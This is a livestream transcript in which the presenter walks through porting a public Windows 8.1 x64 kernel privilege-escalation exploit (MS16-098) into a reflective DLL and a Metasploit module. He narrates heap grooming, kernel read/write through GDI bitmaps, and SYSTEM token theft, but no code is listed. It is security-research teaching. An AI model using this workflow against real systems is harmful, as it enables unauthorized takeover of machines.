serving the world for over 30 years, the space shuttle found its place in history. It's come to a final stop.
We stop here, we'll stop, and we'll take this opportunity to congratulate you, Atlantis, as well as the thousands of passionate individuals across this great spacefaring nation.
Hello, can you all hear me okay? Hopefully you can hear me and everything continues to work just like it used to last year. Because the only thing I've changed is the monitor that I'm streaming. Maybe turn tunes down slightly, roger that, thank you. Let's see. Tune sound. See, that always goes up way too high. How's about that? Is that better? Music too loud? Yep. So can you hear me okay over the music? The music's not too distracting anymore, or do I need to take it down another notch? Music too loud, voice too low. Is that any better now? I can wind that back just a little bit. Doesn't seem to have changed much. How about that? Okay, I'm going to go ahead with that. And if there's any issues or things are too loud or too distracting, then please let me know. Okay? I've managed to fix up the bells in my IRC client, so if you have a question for me as we go, mention my name and hopefully my console should light up and let me know that there's a question there for me. Lagging from web chat on your screen. Yeah, I know that, Tampy, that's the 15-second delay that comes with live streaming through Twitch, so I'll do what I can to mitigate that on the fly. Before we go on, I'm going to mention Guy Baroni on SoundCloud again. This is the guy who I always stream, and I have permission to stream his stuff while doing these recordings. So big thumbs up to this guy. It's a really good sort of backing track, I think, to this kind of stuff. So big ups to him for letting me do that. Still one minor issue. I can hear some dude with a weird accent talking. Shut it. Hey, Paulsec, how's it going? Okay, so what I wanted to do today was sort of a precursor to something that I'm going to do, maybe a number of streams over the next maybe month or so, covering off an actual Windows kernel exploit. I've got a bit of prep work to do before I can actually start with the deep dive. So what I'm going to do today, to begin with, is take an existing exploit, and we're going to wrap it up in something that works inside a Meterpreter session, and we're going to hook that into Metasploit, and hopefully we'll be able to do like a classic privilege escalation exploit by the end of it. So hit me up with questions as you go. There's probably going to be a few confusing things along the way. That's a foosball table, and that is my pride and joy. That thing. Anyone want to come and play me is more than welcome. You just got to get to the other side of the planet to do so. Okay, so the issue we're going to look at is identified by CVE 8.1 x64 LPE, and this was analyzed and owned basically on Windows 8.1 64-bit by a very friendly chap on Twitter. In fact, I'm going to get his Twitter name up now. So here we go, and I'm going to try my best to say his name because I'm pretty poor when it comes to foreign accents, foreign names. So I apologize for any offense that I may cause, but I'm going to go Saif Sharay. That's my attempt. This guy, he did all the hard yards for this, and here is the blog post that discusses it in quite a large amount of detail. I'll paste that in the chat. Okay, and I highly recommend reading this. Now what I'm going to do down the track is we're going to go through this pretty much step by step. We're going to go through patch analysis, bin diff. We're going to analyze the actual functions that have changed. We're going to backtrack to figure out the path to actually get the bug to fire, end up with a proof of concept sort of DOS that ends up with a blue screen. From there, we'll look at the things that we can do to groom the heap and make sure that it's all sort of decked out nicely for us, and then we'll look to build a working exploit. And ultimately, I will focus on 64-bit, but ultimately I'd really like to try and get it working across multiple versions of Windows. So big ups to this chap, epic effort, and he'll be helping me understand things over the next couple of months so I can hopefully share them with you. Okay, so as I said, this is the CVE. There's not a great deal of detail about the CVE here, but there's plenty in the previous blog post that I mentioned, so go read that. But as you can see, there is actually a working functional exploit up here on ExploitDB. Now this exploit does not exist in MSF yet, so that's one of the things that I'm looking to do. As you can see, it's relatively involved, and so what we need before we can do anything with this is we need Windows 8 64-bit, and we need a development environment. So I've got these two VMs up and running, ready to go. So what I'd like to do before we try and actually port stuff is I'm going to grab this code and compile it locally and see if we can actually get it working. So I'm going to grab this, just going to do a straight copy and paste, and we're going to chuck it in a new Visual Studio project. Okay, so let's go new project. Let's go, what do we call it? Actually, I'll leave it as C code, and I'll put the CVE in there. We're going to have a console app, and this is what I like to do when I'm starting off from scratch. Is as I create a console app and then choose app settings and get rid of precompiled headers, security, and specify that I want an empty project. So this tells Visual Studio literally give me a stub project and nothing else. Otherwise, it can put things in there that I really don't want. So hit finish, and this should give me an empty project as listed here. Okay. So first things first, we'll add a new item. I don't use C++ for this kind of stuff, and given that the source is written in C, we'll just stick to C. So we'll create a file called main.c. Alright, let's grab a copy of this again, stick it in our source, and we'll just build that straight up and see what happens. Actually, before we do, what I need to do is add a new configuration. So by default, Visual Studio C projects give you 32-bit by default, but we want 64-bit. So copy settings from Win32, create a new platform called 64, and hit OK. Now what I'm going to do is I'm going to get rid of the debug build by going to Active Solution Configuration, Edit, and get rid of debug. Okay. I'm also going to get rid of Win32 from the solution platform. Okay, so now we've only got release and 64-bit. Okay, so actually I should get rid of it from here as well. There's 1,000 places that you've got to go to remove these things from these. There we go, got to get rid of it from here as well. Win32. Yep. So now we only have one solution config, one solution platform, and we have one project config and one project platform. Okay, so release 64-bit only. Okay, let's just build that again and we'll see what happens. Alright, so I'm a big fan of making sure that warnings go away. So I'm just going to make sure that everything that's here is actually valid. So let's have a look what we've got. Incompatible types. So we're calling load okay, so the problem here is load library is a macro that maps to either load library W or load library A, depending on the Unicode setting. And clearly the Unicode setting that we've got on this project does not match with the load library A. So this string that we've got selected here is a classic ASCII string. So we're passing in an ASCII string to load library, but load library is being mapped to the wide character version. So instead, I'm just going to force load library A, and that should get rid of that warning. There we go, that's gone. This not initialized macro redefinition. This usually means when you get macro redefinitions from Win32, it tends to mean that there's something going on with multiple includes. So as you can see, there's quite a few up here. Let's get rid of WinGDI. That should come with Windows.h. And get rid of WinDDI because that should also come. Yeah, I think WinDDI does. Let's see. Okay, rebuild, and there you go. The conflict of macro redefinition has disappeared, so that's a good thing. What else have we got here? We've got a couple of virtual alloc. We've got an virtual alloc. Oh, okay, I see. So virtual alloc, as in case you're not aware, is a function that allows us to allocate memory with certain permissions. And by the looks of it, we've actually got a hard-coded memory address as the first value. So you see here we actually pass in an address, which is an LP void type. But this is a literal value that is clearly not an LP void. So I'm actually going to cast that. I would assume that value is important. So let's go down here. Yep, we're freeing basically the same spot. So let's do another cast there. And let's see what happens. Yep, there we go. So that got rid of those. And what do we got here? We have a warning that says we're taking an array of bits, or I should say an array of bytes, a pointer to a set of bytes, and we are outputting that as a hex number. So it's saying, oh hang on, sorry, I'm looking at the wrong bit. There we go. So pvscan is, or looks to be, an array of pointers to bytes, whereas bits is an array of bytes directly. So yes, we are missing a level of indirection one way or another. What is this used for later? Let's have a look. Doesn't look like it's used for anything, which is very interesting. So perhaps we can actually get rid of this. I mean, it looks like it's just outputting it anyway. So yeah, let's actually hang on, let's do that. It's not used. I'm just going to comment that out. This block of code shouldn't be doing anything. There you go. Okay, so as we can see, we've actually got an executable. Now, I know up front that this is a completely clean installation of Windows 8, and therefore it doesn't have any runtime libraries. So what we need to do to get this executable to run on systems that don't have the runtime libraries is we're going to have to modify some C++ settings, or is it code generation? So runtime library you'll see here is set by default to multi-threaded DLL, and that means that it requires certain DLLs to be on the target system. So instead we're going to change this to multi-threaded without DLL, and that should help produce a standalone executable that we can copy over. Okay, any questions or commentary so far? Nope. Thanks to everybody who is involved and watching. Slickus. Are you at a stand-up desk? Yes, I am at a stand-up desk, and probably by the end of this stream, I will be sitting down. Hey, Got Milk, the Evox, and everybody else. Remember, hacking without T is very uncivilized. All right. Back to the studio. So, we've got this being output to, let's have a look. Open containing folder, there it is. So it gets spat out to, no, not there. I hate the way that by default Visual Studio does this stuff, which is why I tend to have a bunch of templates for serious coding that doesn't spray junk all over the file system. But there's our executable right there. Can I actually copy and paste this across VMs? No, I can't. That's not really an issue anyway. So let's take a copy. Now I know where this is because I've got some mappings. So code CVE. Is that where it was? Hang on just a minute. Here I am calling, saying that I know what I'm doing, and clearly I don't. Ah, that's in local. Okay, that's the problem there. So I'll take a copy of that and we'll just shove it in Scratch. Okay. Righto, so let's copy Y. Z Scratch CDE.exe. Okay, so we've got a copy of the exploit running locally. Who are we? We're currently OJ on a pleb VM. So what happens when we run our exploit now? Triggering exploit, previous page leaks, some pointers get spat out. Right, there we go. Easy, it works. I have to admit that I was looking at this a little bit earlier, and there was one thing that did pop out to me, which is a little bit concerning. So if I go exit, you can see it sitting there and it's just waiting for another character, but as soon as I hit enter, we end up with a blue screen of death. So I'll take you through the reasons why I think this might be the case. And I know I've asked this already of Save, if that's how you say his name. Based on the exploit, you can see there's quite a bit of stuff going on. This feng shui function is a block of code that does a bunch of heap manipulations. It's creating stuff in the kernel heap and freeing them up and trying to put holes in certain locations so that when a certain element is invoked, or a certain API function Win32 is invoked, that an object is allocated in a relatively well-known location so that when an overflow occurs, well in this case it's an overflow that is the result of an integer overflow. So an integer overflow that is hit through a particular path that this code takes results in an allocation, I think, of memory that's too small and a bunch of data written that's way too big. So you end up with a pool overflow in the kernel, and then a bunch of other bits and pieces need to be in place. So you can do things like create GDI objects and use those GDI objects to actually read stuff out of kernel space and write stuff back into kernel space. So this feng shui function is about preparing all of those areas of memory. And then you can see down here, so there's a few GDI objects created here. This begin path, polyline 2, and end path, I believe, is kind of the bulk of the trigger code that results in things breaking. Once that's all been set up, we then do the heap feng shui, and you can see here this fill path. This fill path function here, I believe, is the one that actually invokes the bug. According to the blog post, I think that's what it says. So if that invokes the bug, and from here you can see it's looping through all of the bitmaps that it's allocated, and it's searching for one that has been overflowed. So imagine it's groomed the heap and it's done a bunch of allocations and frees, and one of those frees has resulted in a hole that's been taken up by something else behind the scenes in the kernel, and that's what we've overflowed. So I believe this code here is making an attempt to locate the gap that was filled in, and once it finds it, it does all this stuff here, which we won't go into because we're going to do a deep dive on this a bit later on. Okay, so once that's done, once it's figured out which of the bitmaps it can use to manipulate stuff, it attempts to clean up some of the pool header metadata, I think, that it has overwritten. This may or may not be buggy, I'm not too sure, but we will hopefully find out another time. And then when that's done, you can see here there's some interesting token stealing shellcode that is executed, and this is different to a lot of the approaches that you tend to see, because here you're actually kind of using a bitmap handle to write data to somewhere in memory. So you can see here there's this setAddress function. setAddress manipulates these bitmap bits to point to a certain location, right? And then where are we? Let me just go back to where we were. And then there's this write to address, which actually takes a set of data and writes things to the address that we've actually previously set. So what it's doing here is it's using the objects that it's allocated somewhere in the kernel and pointers that reference to them in order to write data to the kernel. And so here it's executed some functionality that says, give me the location in kernel memory of where the system process is, and the same story with the current process. And then from here we're going to read the system token, and then we write the system token over the top of what our current process's token happens to be. And at that point we just run a system command to invoke another command.exe, and from there we should be operating under the context of the system user. As you saw just now, that's exactly what happened. When we exit that, we hit this get char just here, and that get char sits there and waits for you to hit enter, basically. And then when we hit enter, this all finishes up, and that's when we end up with the blue screen. So as a result of this thing not being ready to actually deploy properly to MSF proper, I'm not going to submit a PR at the end of this, but what I am going to do is everything but that. So we're going to end up with a working reflective DLL that can be spun up in the target. We're going to have Metasploit module sitting there as a local exploit, and we're going to fire the exploit through a Meterpreter session in an effort to spin up a new system shell and get Privesk. As long as that shell does not exit, it should continue to function. We've got a ping. Well, let's have a look. Oh, there's quite a few. I'm going to have tea. What tea? Greetings again to the newcomers. What is a bitmap bit? So, when you're dealing with the Win32 API, you can create bitmaps. Bitmaps are just blocks of memory that are often interpreted as images. And an H bitmap is a handle to a bitmap, and that handle is a pointer to userland, and inside that somewhere there are references to areas in the kernel. So bitmaps actually have memory allocated somewhere in the kernel, along with accelerator tables and various other things. So there is functionality that allows you to manipulate data within the context of a bitmap, and those functions that we were just looking at are the ones that allow us to do that. So for example, let's go back here. Set bitmap bits is basically saying, hey, I've got this bitmap and I want you to take this data here, this array of basically pixels, and associate that with the bitmap, right? And you can do the opposite of that and say, hey, give me the current content of the bitmap as an array. So that's what get bitmap bits does. Okay, and that's how you can sort of read and write memory out of the kernel. in the way that this is put together, the pointers that, or the data that's stored inside those bitmaps are actually pointers, and those pointers are used to sort of read and write data to kernel-based memory. So you can see actually as part of this process down here, this bit here is actually leaking chunks of data. So here I get the header from, so there you go. You end up with getting a pointer to the bits, and this stuff here is leaking kernel memory by reading these particular bits, basically. I hope that answers your question anyway. Hey OJ, how do you use LPE exploit and MSF without using Meterpreter? That's a good question. You effectively can't. You can generate, you could take a self-contained kernel exploit and you can wrap it in your own loader. But again, that's sort of outside of the context of Metasploit. So the idea of not having a Meterpreter session in Metasploit, at least for Windows, and then attempting to use a post module like this doesn't necessarily make a lot of sense. And a big part of the reason for that is because Windows kernel exploits in Metasploit are all wrapped up in reflective DLLs. And as you'll see when we go through the process of creating the exploit in just a minute, you'll see that there are functions baked in that kind of rely on the thing being invoked by Metasploit, because there are pointers that get passed to it. So someone decided to hand up pointers to kernel memory to a user. When you say someone, I think it's fair to say it wasn't a particular person. This is a side effect of the bug. So the way that the heap was manipulated allows you to read beyond the context that you were supposed to be able to read, and that context is paged. It might not be paged, but it's pool memory, it's kernel pool memory, and they tend to have pointers to various areas of memory in them, and that gives you an idea of where things are, and bypassing things like KSLR and whatnot. Okay. Right, let's go back to our VM. So we can see that this exploit actually works, which is great. So we've got enough code here to be able to continue. What I'm going to do now is you can see I'm sitting in Metasploit framework here, and I've got this Windows LEP. It's supposed to be LPE, but I typoed. Windows LEP exploitation stuff. This is something I whipped up earlier on, which is like a self-contained project that we can use as a template for future kernel exploits. And this is based on one that I used for the Capcom exploit a few streams ago. So I'm working off this branch here because I want to use this template and sort of give a demonstration of how you would go about using this template yourself down the track. Okay, so back to here. Let's create another Visual Studio instance. And before we do that, let's go to Metasploit framework. So inside the Metasploit framework folder, this is just a mapping to my host virtual machine. You'll see that we've got Metasploit framework, external, source, exploits. Now inside here are the source code for all of the exploits that kind of get pushed up as part of a post module and a local exploit. So there's the Capcom one that we did a few weeks back, maybe a couple of months ago now. This Windows LPE template here is the one that I've recently created, which is basically a stub. So I'm going to show you how we can take this template and actually do something sensible with it. Okay, so literally copy and paste it. We're going to call this CVE 2016 3309 because that's the name of the CVE that comes with it. Okay. Right. I'm going to now these files here, the SDF and the SUO, are files that existed because I built that project earlier on, but you wouldn't see it in the repository when you come to do this down the track. And the same story with release. Okay, so the content of this folder will only contain this MS build, this solution, and these files just here. So
first step is to actually rename these things to match the CVE in question. 20163309. I'm going to edit this makefile. You'll see that we've got Windows LPE. So again, I'm just going to rename all of these. Go 1, 2, 3, CF3E. Oops, C3FE. There we go. Building CVE dash 20163309. There we go. Now that's actually going to be lowercase there. I like to keep all of the solution related bits and pieces lowercase to avoid confusion and potential issues down the track. Now, one thing that's worth noting is that this makefile that we actually use to build things from the command line, I'm going to modify this because we don't actually support x86. So I'm going to change this to building blah x86 is not supported. There you go. So there's at least a message. And what we'll do is we'll change this target name all so that there's only 64-bit in there. Right? So we know that we're actually only building a 64-bit version of this exploit, so we're making sure that our makefile only builds and supports building the 64-bit version. Okay, so configuration release, platform 64-bit. All right, so that's the modification that we make to the build. Again, we will need to rename this folder and the files therein. So we'll do the same here. Now, when we come to open this, in fact, I can close this and just double click. When we come to open this solution, it will still have errors because inside the solution it's pointing to something that doesn't exist. So we can get rid of that reference inside the solution. And when that's done, we can right click on it and say add existing project. And here you can see we can just add to 3309. We just need to point it at the existing CX proj. And here we go. So you can see there are actually 4 files included here by default, even though there's only one file on the file system in this location. And that is because there are some kernel helper libraries that have been made that allow certain things to be done substantially easier. Okay, so let's just quickly go through this template. To begin with, at the top here, you'll see that there are a couple of defines and a couple of includes. The defines are really important. The 2 defines basically tell the reflective injection library that we want to support the ability to load reflectively the library in a process that is not local. So it's not reflective within the current process, it's reflective within the remote process. And also that instead of using the pre-canned DLL main that comes with the reflective DLL injection library itself, we want to use our own. So we'll see what that's like in it. And then once you've done those defines, you have to include this reflective loader.c, which comes with all of the magic that reflective DLL injection requires in order to be able to load itself without touching disk. Finally, this kernel.h file is it's one that was written by, or to begin with, me, and it has a bunch of stuff in it that's designed to make things easier. So the aim here is like there's going to be some general things that you do when doing kernel exploitation, and this will slowly and surely become more and more populated. Ironically, for this particular exploit, there's basically nothing here that is useful. So I will probably just end up removing this kernel.h and going from there. Now, skipping this run exploit function and just going down to DLL main, you'll see that this is the program entry point once the DLL has been reflectively injected. And there are only 2 sort of semi-interesting parts to this. The first is query module. Query module is invoked, I should say DLL main is invoked with the query module reference by external libraries to say, hey, what instance of process are you currently attached to, I should say application. That's just typical Win32 stuff we don't need to worry about really. But this is more interesting. So DLL process attach is invoked with this LP reserved parameter. Now there is an assumption here that LP reserved is a pointer to the shellcode that you want to run as soon as the exploit has been successful. So the aim is to go, hey, we've managed to elevate ourselves to system in this process. Once that's worked, let's execute this shellcode. Actually, that reminds me, I am going to need this because there is a very helpful, what is it? Prefer kernel. Execute payload, there you go. So we can invoke execute payload at the end of our exploit to get that kind of thing to work. All of this other stuff here is sort of stub functionality, so do your local variable definitions here, do your work here. Here's an example of how you would break out of this do while zero loop, which is kind of a cheeky way of doing gotos, but without using gotos. And then this area here is kind of intended for you to put your kernel-related exploitation tasks in, and assuming that you've called the helper function of steal process token, you can then say, well, if the token was replaced and we were given a payload, then go ahead and execute the payload. Now, as we saw with the exploit that we've already looked at, we're actually doing token stealing in a very different way by manipulating bitmaps and using that for reads and writes. So that means most of the pre-baked stuff that we would normally use for exploitation can go away. The only thing I am going to keep is this execute payload. But for now, I'm just going to comment that out. Right, so let's start taking the content of this exploit and porting it over. Before we do, let's just quickly build this to make sure that it doesn't break. Right, there we go. So, there's a very small issue here. So, it's created Win32. Ah, yes, well, we don't want Win32, so we're going to have to do the same thing here. We want to get rid of, we don't need release, sorry, we don't need to get rid of that, but Win32 is here. So we want to get rid of Win32 because this exploit does not support the Win32 platform. So let's quickly do what we did in the other project and remove this stuff. And let's build that again. There we go, that's much better. So you can see here, it generates exploits, release x64, c blah blah blah. And there's actually functionality inside the project that copies that DLL that was created and puts it in a folder inside MSF that we can then reference later on as part of our exploit. Okay? Questions? Is anyone commentating? How is this already happening? I might not even have copy. Null mode, welcome to the show. Maxi, we are talking about porting a standalone exploit from EDB and making it so that it can be used directly within inside Metasploit once you've got a Meterpreter session. So if Metasploit and Meterpreter aren't your thing, then perhaps this isn't the stream for you, but please stick around if you're interested. Idle Sports reported for hacking. That's funny. Okay, so what's the archive? Okay, thanks, mate. Have a good one. What exploit is being done here? So as I said, the exploit that we're looking at is something that was not actually originally written by me. It is this integer overflow functionality bug inside Windows. This particular version is 8.1 64-bit, but I believe, based on the details in the Technic article from Microsoft, that pretty much every Windows-based OS from Vista onwards is ownable through this particular issue. Although, the differences in platforms and service packs and things like that may result in a slightly different exploitation path. Okay, so hopefully that is of use. Just make sure that everything's still functioning correctly. Yep, looking good. Okay, so with that out of the way, what we're going to do is we're going to start moving the code over. Moving the code over from the project that we had just built over here. And I'm going to do it sort of piecemeal rather than just doing a big copy and paste to make sure that we're including the stuff that we need. This isn't going to be like a really clean port. The focus that I want to put on tonight's stream is actually getting it working. Okay, so we're going to start with main. Let's grab the contents of main and we're going to paste it right here. Glorious. Messy as, but that's okay. Let's use Visual Studio to tidy it up a bit. Alright, now what I tend to do here is I'll go through and look at all of the issues that have appeared as a result of using this and get rid of them slowly but surely. Now, step number one here, this fprintf clearly doesn't exist. Now we're working inside the context of a DLL, we have no console. If this fails, we're going to exit. Simple as that. Right? Same story here. Well, if that doesn't actually succeed, if this polyline 2 doesn't succeed, does that indicate that something is really amiss? I'm not exactly sure. What I'm going to do for now is I'm just going to replace that with a continue statement so that we can jump on to the next one. I would assume that that's not going to happen if we got this far, but yeah. Right, so let's anyway, we'll move on. Again, we've got more fprintfs. We're going to put another break in here because if the fill path fails, we can't do any more. If virtual alloc failed, again, let's break and skip out. Every time I hit break, by the way, this exits this outer loop. If it wasn't clear, we've got this do. And so every time we hit break, it basically jumps down past the end to here. Okay. So the reason why we do this is to reduce the number of times that we check for errors and free resources. So these resources here, for example, they belong outside of the loop. Whoops, outside of the loop. And then later on, when it comes to freeing them up, like see this delete object and free and all that sort of stuff, that belongs out here. And technically what we should be doing is going if, for example, bitobj doesn't equal null, then we free it up. Oops. Okay, so that's the kind of thing that we'd be looking to do. One would assume that if we don't create these objects sort of as we go, there's a big assumption there that everything has worked correctly. So what I'll probably end up doing is moving each one of these into this do while still having the definition, or I should say declaration of the variable here. So we're creating them all here, but we'll initialize them to null here, okay? Then, if any of these things fail, right, so if HDC is null, then we can break. We know that that failed and we can early exit, right? Same story here, if hmemdc is null, break. And so on. Whoops. So on and so forth. Sorry, my Vim foo is letting me down a bit tonight. Bitobj. Okay, so if any of those things actually fail, then we want to bail out. That's really not a good thing. But that also means that down here, we need to put the bunch of checks around this stuff. Okay, so we only do these things when absolutely necessary. Okay, so if hmemdc is not null, we only delete the device context. That's what DC stands for those people who have never done anything to do with Windows GDI. DC stands for device context, and it's something you kind of use to do things like drawing and create images within. It's like this sort of general graphics related context, and they can be on screen, they can be on disk, they can be in memory. But yeah, that's what's being used extensively here. I like to set my code to use doesn't equal null, even though it's not necessary. And let's just have a look here. So when we did this virtual alloc, this fake, that actually returns the actual address of the allocation. Now virtual alloc may not necessarily respect this allocation here. So the question is, do we need to care about that or not? I'm going to go with no. I'm going to assume that this fake thing succeeded if we got that far. It'd be interesting to know what would happen if you attempted to virtual free something that wasn't created. So actually, let's put a little safety wrapper around this to make sure that everything was allocated okay. So we'll have a bool saying fake allocated is false, right? And then down here, we will go fake allocated is true. So we know that the fake thing was actually allocated, and then down here we can wrap this in a safety check. So if the fake was allocated, then we'll actually do the free. Now all of this stuff at the moment is relatively superfluous, given that we actually don't even want to get here, because everything will break prior to that anyway. Right, have we got more commentary? Yes, we do. Jardeth, greetings, mate. How's it going? Thanks for sharing that link, Parks. That's super handy. Righto. So with that in mind, let's quickly go back to getting rid of these. I mean, if the get bitmap bips failed, we actually don't care, so I'm just going to ignore that. We've got this gconfig, which clearly is missing, and let's get rid of this junk as well. I'm going to just clean up some comments that we don't really need. That comment there is rather obvious, given that we're calling a function called function. What else we got? We need these. We seem to be missing bits and bitmaps. We're going to get rid of the fprintf call here. In fact, let's just find them all. There we go, because all the debug output we don't actually want. We can't see it anyway, so we don't actually want to attempt to output anything. What's interesting actually is a little side note. Back in the early days of the Kiwi extension, my extremely poor form resulted in me committing the first few versions of Kiwi with a bunch of debug statements still baked in that would output stuff to the console. Now this wasn't really a problem because for the most part when people are running a Meterpreter session on a client, they tend to be running inside processes that can't be seen. But I had one user of Metasploit contact me one day and say, hey, I had this really interesting issue where I migrated to a command.exe that was running under the context of the administrator. And I ran the Kiwi extension and dumped credentials. And so not only did it dump all the credentials down to Metasploit so that you could read them, all of the output that you usually see in Mimikatz was rendered directly to the console in front of the administrator live, which obviously raised some alarms. Excuse me. So straight away I got onto that and made sure that I removed all of the output functionality from Kiwi. Thankfully we don't have that problem anymore. But yes, that's how those things can bite you in the butt if you're stupid, which I clearly am. Okay. Now let's find what these variables should be. We need bits, so let's go back over here and find out where bits was allocated. Looks like it might be a global. Here we go, we've got a few globals here. I'm assuming each one of these is going to be important. So let's take a copy of those. Whoops. Let's stick them up the top here. We'll get rid of that comment there. as I said, I like to initialize my stuff. It's probably not that important, but who knows? I just find it a little cleaner. You're marking your intent at least as well. Righto, so what do we got here? We've got a structure here that contains a unique process ID offset and a token offset. Okay, right. And this instance of it here shows offsets that are specific to Windows 8.1. So I would assume down the track the intent here is to create more instances of this version specific config that's bound to versions of Windows, and you can pull the offsets out on the fly. Now we don't really care too much about this, so we're not going to, we're not going to change it, we're not going to modify it, we're just going to leave it as is. Interesting that this array here is static. I wonder why it needs to be static. I might have to ask the question. We'll leave it as static for now because we don't want to modify too many things in case things break. Right, so what do we got? We're also missing bitmaps. Now, why haven't we got bitmaps? We've got another static variable here just a little bit further down. So let's shove that in. Again, why that's static, I'm not sure. I mean, technically they are all static at this point. You can even I think you should be able to initialize those to 0 as well. And if we build that, we should probably not get a working thing because there are some functions in here that it's relying on. Now let's get rid of, here we go, we've got a bunch of other issues that we're going to have to fix, but that's okay. They're all just warnings, and that's because functions are missing. So we've got a printf call. Let's get rid of that. Set address, that's clearly missing. Right to address, all of these other ones are missing. System. We're not going to be calling system at all, are we? We're actually going to be calling execute payload because that's the thing that's being passed in. So we can get rid of the system call. We can get rid of getchar. We can get rid of that stuff. And let's just build that again. Now, you probably noticed that none of these are actually errors. They're all warnings, but there is this error at the top that says warning treated as error. The template that we use to create this encapsulated exploit is set to mark all warnings as errors because we like to make sure that we build cleanly. Okay, let's fill in the gaps. We'll start with set address because from what I can remember, set address was actually a fairly trivial function. Here it is. Set address, write to address, read from address. They all look pretty trivial, so let's just copy these over. We'll put them near the top so that we don't have to do the pre-definition of each of these things. You know, the forward declaration, I should say, is the term that we were looking for. I'm just making sure that I'm adhering to various coding styles that we like to have inside Meterpreter exploits. So pardon my pedanticness for having bits and pieces in place. Alrighty, what else have we got? That should solve a bunch of them. Feng Shui is undefined. Let's do these process functions because I would assume like these are actually looking for functions in kernel space. Yeah, that's classic sort of looking for functions. We're not going to dive into this just yet. I am, like I said, going to do a bit of a deep dive in the general kernel exploitation process. And that will include what all of this kind of magic does. Probably more in particular, though, I will go through this version here, which is platform agnostic. So let's just have a quick squiz at it. Where are we? Prepare for kernel. Here we go. So you can see here there's a prepare for kernel which does a bunch of looking for magic stuff, including HAL dispatch table references and various other things. It gets proc addresses. It also does things like looking for the right process in memory and determining kernel addresses and whatnot on the fly. But we're going to use the ones that come with the exploit this time around because they rely on using the bitmaps. You see here we've got this read from address. That's actually using bitmaps in order to do that. Alright, so we've got this get NTOS base. That's another function that appears to be missing, so let's quickly grab that. That doesn't look particularly scary, so NTOS base is actually enumerating device drivers, which is not unusual, but is atypical, shall we say. Okay. Enum device drivers. Well, enum device drivers, what does that come with? Let's have a look. That's inside PS API, so we need that include up here. Let's hope it doesn't break anything. Nope, that's good. So we're down to just one function, and this is the heap massaging feng shui kind of thingo. And this has a bunch of interesting stuff in it. Is it feng or fung? Feng? Fung. There it is. Alright, so let's grab the body of that. And instead of calling it feng shui, I'm going to call it something a little more meaningful. Let's, well then again, everyone seems to know it as heap feng shui, don't they? So we'll call it heap, is it feng or feng? I honestly don't know. Let's paste the body of that in like that and do what we should have done already. Define, let's mistype it and get Google to correct us. Feng shui. Because, you know, we like to be accurate. Heap. I am terrible at the keyboard. There you go. So let's just call it that. Okay. Allocate clipboard 2. So this looks like we've got a few dependent functions sitting here. Allocate clipboard 2. What does that do? Let's have a look. Allocate clipboard 2. That doesn't look too complicated. Let's, whoops. Yeah. My selection shortcut seems to be selecting the whole file when I do that. That's a bit strange. Oh well, never mind. Okay, so let's get rid of this commented out stuff because clearly it's not needed. At which point, what do we got? We have from what we can tell, a fully compiled exploit. Be afraid. Be very, very afraid. Okay, so the way this is structured, like I said, is it copies the DLL that we've just created over to a known location inside Metasploit, which is where all of the actual binaries sit, and that gets committed to MSF when we've actually finished working on our exploit. Let's see, just check questions again. That story just made my night. Thank you. Null mode, is that a Vim emulator in VS? Yes, it is. It is called VIMU. It is the emulator that I use in VS. Enjoy. That VIMU is actually made by one of the original coders, if not the original coder, on the Commando series, for those people who love the Commando games back in the day. So yeah. Right, okay, so this is really good. We've got our binary sitting where we want it to be. We've effectively got everything sitting here ready to go on the binary side. What we need now to work on is the Metasploit side. Okay, so this is where I am going to do a bit of sort of copy and paste related bits and pieces. So we'll go into the modules folder. We should go into exploits, Windows, local. And you'll see we've got all of the local exploits for Windows currently sitting here. Now, knowing full well that what we're going to be doing is something very similar to the Capcom exploit, which is hard-coded to 64-bit, we're going to do the same thing. So I'm going to copy that, and we're going to rename it to MS. Well, let's just undo, what was it, MS16098. That's what we need to call it. So just for the sake of making sure that we're consistent with our naming, MS16_098. Now, again, according to this thing here, it is an integer overflow in RNG obj. So we will also use that RNG obj integer overflow.rd. And let's open that one up. I'm sure there's a shortcut, a bash shortcut that mentions that argument by index, but I'm not that lead. Righto, so let's just expand this out a bit. Let me know if these fonts are too small. With a bit of luck, they won't be. Righty-ho. So, first of all, credit where it's due. This is, what's his name? Safe Sherry. And he wasn't responsible for issue discovery, but he was the author of the original Windows 8.1 x64 exploit. And me, I am just responsible for the MSF module. Okay, now all of this stuff here we're going to reuse pretty much for the most part, but what I'm going to do is just walk through. So first of all, we need to put a nice description here. We need to go MS, we'll call MS16098 local, what is it, RNG obj integer overflow exploit. We'll go Windows 8.1 x64 only. I've got a question. Firefighter, I think it's RNG obj, not RN. Sorry, you might be right. Let's get our naming correct. RGN, you are correct. Thank you. Okay, so that means I'll have to just fix that up. Thanks, Firefighter, for doing that. Hooray for crappy typos. Okay, hopefully that is better. Thanks again, that was helpful. I hate it when things like that happen. So this is Windows x64 8.1. I mean, this annoying, for some reason recently, my Vin's been doing all kinds of crazy stuff locally. I don't know why. I think maybe an update has resulted in Ruby-based behaviors changing. But anyway, so Windows, we need to make sure that we have Windows 8. We're just going to make sure it's 8.1. So 8.1, we're going to hard code it to that. We need to make sure that the architecture, now this is interesting. I think I've just spotted a bug. So very recently we made a bunch of adjustments to Metasploit. When I say we, I mean I in this particular case, around architecture and platform. And the reason we're doing that is because we're trying to make it so that handlers that are listening inside Metasploit can listen to pretty much any connection that's coming in and identify what they are on the fly and serve up the right payload to match the architecture and platform. So if you get a HTTP connection coming in and it says, hey, I'm Java, you can say, oh, okay, I'll go and get a Java payload for you and serve that up. If it comes in and says it's 32-bit Windows, you get a 32-bit Windows thing. But this line just here implies that this exploit was not, the Capcom sys exploit, was not updated to match that architecture change. So sysinfo no longer returns wow64 in the context of this session. Okay, so we need to make sure that instead of looking at sysinfo architecture, we actually look at the current session's architecture. So we can get rid of this and we can say unless client, are we using client here? Client.arch equals arch x64. So if it's not 64-bit, we are considering it to be safe. Okay. So, anyone want to make sure that my logic is sound? Firefart, you're probably a good man to be referencing here. So unless we're a 64-bit, we're going to mark ourselves as safe. If it's not Windows 8.1, we're actually going to say, yeah, not exactly sure. Now the Capcom sys exploit actually did a validation of making sure that the Capcom driver was installed, but we don't need to do that. So I'm going to change this so that when we get to this point, we appear to be vulnerable. Okay, so that's what the check function looks like. So the check function basically says make sure that the thing that we're about to run is actually useful on the target system. Go and make sure the target system is actually up to date, is appropriately configured. For the sake for our needs, that's probably going to be enough. We should technically probably check versions of the underlying Win32 or Win32k.sys file, but for the sake of this particular issue and this stream, we're going to skip it. I should put a valid reference in here, shouldn't I? Let's go back to IRC where lots of friendly people have pasted that link. Here we go. We'll shove that in there. 